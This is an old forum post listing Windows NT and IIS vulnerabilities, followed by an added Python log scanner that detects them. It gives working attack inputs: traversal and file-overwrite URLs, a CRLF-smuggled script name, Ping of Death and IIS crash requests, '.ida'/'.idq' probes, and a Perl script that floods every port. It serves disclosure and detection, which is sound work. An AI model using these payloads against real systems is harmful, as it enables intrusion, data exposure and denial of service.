NT vulnerabilities and descriptions (English)

Posted on 2011-1-13 17:12:25
Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # chat2.pl ships with the older Perl distributions this was written for

$systemname = $ARGV[0] && shift;   # host name taken from the command line

$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports

for ($port = 0; $port < 65535; $port++)   # original read "$port = $0" (a typo for 0)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
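The malformed request shapes listed in this post (the '..\..' traversal, the '>PATH\target.bat' output redirection, the '%0A%0D' line break in a script name, the '.ida'/'.idq' path-disclosure probe and the overlong '...ida' URL) all leave a recognisable trace in the web server's request log. The following is an added example, not code from the original post or from any Microsoft tool: a small rule set run over constructed W3C-style IIS log lines. The sample lines, the field order and the overlong-URL threshold are assumptions made for illustration.

```python
"""Flag the malformed IIS request shapes described in the post.

Added example, not code from the original post: a small rule set run over
constructed W3C-style IIS log lines. The log lines, field order and the
overlong-URL threshold are assumptions for illustration.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Assumed threshold: the post describes a URL of ~25 KB of '.' before 'ida';
# anything this long is already far outside normal request sizes.
OVERLONG_URL = 2000

# Constructed sample log (assumed W3C extended format, one request per line).
CONSTRUCTED_LOG = "\n".join([
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2011-01-13 17:12:25 10.0.0.5 GET /default.htm - 200",
    "2011-01-13 17:12:26 10.0.0.7 GET /..\\.. - 403",
    "2011-01-13 17:12:27 10.0.0.7 GET /scripts/script_name%0A%0D>c:\\target.bat - 500",
    "2011-01-13 17:12:28 10.0.0.9 GET /anything.idq - 404",
    "2011-01-13 17:12:29 10.0.0.9 GET /" + "." * 300 + "ida - 500",
])

FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]


def decode_path(raw: str) -> str:
    """Percent-decode once and turn backslashes into forward slashes, so that
    '..\\..' and '..%5c..' are judged by the same rules."""
    return unquote(raw).replace("\\", "/")


def classify(raw_path: str) -> List[str]:
    """Return the labels of every rule the request path matches (empty if clean)."""
    path = decode_path(raw_path)
    findings = []
    if re.search(r"\.\.(/|$)", path):                     # '..\..' and 'scripts..\..\name'
        findings.append("traversal")
    if ">" in path:                                        # 'exploit.bat>PATH\target.bat'
        findings.append("output-redirection")
    if "\r" in path or "\n" in path:                       # '%0A%0D' smuggled into the name
        findings.append("crlf")
    if re.search(r"\.(ida|idq)$", path, re.IGNORECASE):   # path-disclosure probe
        findings.append("ida-idq-probe")
    if len(raw_path) > OVERLONG_URL or re.search(r"\.{100,}", path):
        findings.append("overlong")
    return findings


def parse_w3c_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into the assumed FIELDS; skip comments and short lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, raw uri-stem, findings) for every request that matched a rule."""
    hits = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        findings = classify(rec["cs-uri-stem"])
        if findings:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], findings))
    return hits


if __name__ == "__main__":
    for ip, stem, findings in scan_log(CONSTRUCTED_LOG):
        print(f"{ip} {stem[:40]!r} -> {', '.join(findings)}")
```

Decoding the path once and folding backslashes into forward slashes before matching is what lets a single traversal rule cover both the literal '..\..' form and its percent-encoded variants; the '.ida'/'.idq' rule is kept separate from the overlong rule because the post describes the short probe (path disclosure) and the long one (crash) as different outcomes worth different responses.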
汶上信息港 ( 鲁ICP备19052200号-1 )